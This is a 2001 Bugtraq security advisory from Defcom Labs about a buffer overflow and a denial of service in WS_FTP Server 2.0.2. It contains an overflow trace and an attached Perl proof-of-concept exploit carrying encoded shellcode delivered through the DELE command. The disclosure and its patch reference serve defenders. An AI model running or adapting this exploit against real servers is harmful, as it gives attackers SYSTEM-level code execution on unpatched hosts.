[21881] in bugtraq
def-2001-28 - WS_FTP server 2.0.2 Buffer Overflow and possible DOS
daemon@ATHENA.MIT.EDU (andreas junestam)
Thu Jul 26 11:51:56 2001
Message-ID: <3B600C29.DADDFC63@defcom.com>
Date: Thu, 26 Jul 2001 13:25:13 +0100
From: andreas junestam <andreas.junestam@defcom.com>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Cc: Olle Segerdahl <olle@defcom.com>
Content-Type: multipart/mixed;
boundary="------------C4C0A63EEF25A05BF6224EB3"
--------------C4C0A63EEF25A05BF6224EB3
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
======================================================================
Defcom Labs Advisory def-2001-28
WS_FTP server 2.0.2 Buffer Overflow and possible DOS
Author: Andreas Junestam <andreas@defcom.com>
Co-Author: Janne Sarendal <janne@defcom.com>
Release Date: 2001-07-26
======================================================================
------------------------=[Brief Description]=-------------------------
WS_FTP server 2.0.2 contains a buffer overflow which affects the
following commands:
* DELE
* MDTM
* MLST
* MKD
* RMD
* RNFR
* RNTO
* SIZE
* STAT
* XMKD
* XRMD
This buffer overflow gives an attacker the ability to run code on
the target with SYSTEM RIGHTS, due to the fact that the server runs
as a service by default. OBS: This is only valid when logged in as
an anonymous user, not an ordinary one.
The server also contains a easy-to-trigger DOS.
------------------------=[Affected Systems]=--------------------------
- WS_FTP server 2.0.2, havn't tested other versions
----------------------=[Detailed Description]=------------------------
* Command Buffer Overrun
All the above mentioned commands seems to be using the same parsing
code which suffers from a buffer overflow. By sending a command with
an argument greater than 478 (474 bytes + new return address) bytes,
a buffer will overflow and the EIP will be overwritten. A
proof-of-concept exploit is attached to the advisory, which works
against WS_FTP server 2.0.2 running on WIN2K (Professional and
Server, any SP).
C:\tools\web>nc -nvv 127.0.0.1 21
(UNKNOWN) [127.0.0.1] 21 (?) open
220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
220-Tue Jun 19 14:00:21 2001
220-30 days remaining on evaluation.
220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
user ftp
331 Password required
pass ftp
230 user logged in
DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Access violation - code c0000005 (first chance)
eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278
edi=77fca3e0
eip=41414141 esp=0104df88 ebp=41414141 iopl=0 nv up ei pl zr
na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00010246
* Possible DOS
By sending a couple of NULL(0x0) characters, the WS_FTP Server
will spike at 100% CPU.
---------------------------=[Workaround]=-----------------------------
Download the new version from:
http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html
-----------------------------=[Exploit]=------------------------------
See attached file, ws_ftp.pl
-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendors attention on the 18th of
June, 2001. Patch is released.
======================================================================
This release was brought to you by Defcom Labs
labs@defcom.com www.defcom.com
======================================================================
--------------C4C0A63EEF25A05BF6224EB3
Content-Type: application/x-perl;
name="ws_ftp.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="ws_ftp.pl"
#!/usr/local/bin/perl
#########################################################################
#
# WS_FTP Server 2.0.2 DELE proof-of-concept exploit
# By andreas@defcom.com and janne@defcom.com (C)2001
#
#########################################################################
$login="ftp"; #username
$pass="ftp"; #password
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
print "WS_FTP server 2.0.2 DELE proof-of-concept exploit\n";
print "It creates a file named defcom.iyd in the c-root\n";
print "(C)2001 andreas\@defcom.com\n";
print "Usage: $0 <host>\n";
print "Example: $0 127.0.0.1\n";
exit;
}
use Socket;
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "21";
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
sleep(1);
$msg = "user $login\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "pass $pass\n";
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$sploit = "\x8b\xd8\x8b\xf8\x83\xc0\x18\x33\xc9\x66\xb9\x42\x81\x66\x81\xf1\x80\x80\x80\x30\x95\x40\xe2\xfa\xde\x1e\x76";
$sploit = $sploit . "\x1e\x7e\x2e\x95\x6f\x95\x95\xc6\xfd\xd5\x95\x95\x95\x2b\x49\x81\xd0\x95\x6a\x83\x96\x56\x1e\x75\x1e\x7d\xa6\x55";
$sploit = $sploit . "\xc5\xfd\x15\x95\x95\x95\xff\x97\xc5\xc5\xfd\x95\x95\x95\x85\x14\x52\x59\x94\x95\x95\xc2\x2b\xb1\x80\xd0\x95";
$sploit = $sploit . "\x6a\x83\xc5\x2b\x6d\x81\xd0\x95\x6a\x83\xa6\x55\xc5\x2b\x85\x83\xd0\x95\x6a\x83";
$msg = "dele " . $sploit . "\xd4" x (460-length($sploit)) . "\xf6\xaf\xc9\xf1\xf0\xf3\xf6\xfa\xf8\xbb\xfc\xec\xf1\x95";
$msg = $msg . "\xab\xa3\x54\x77" . "\xd4" x 16 . "\x8b\xc4\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x71\xff\xe0\n";
print $msg;
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
exit;
--------------C4C0A63EEF25A05BF6224EB3--
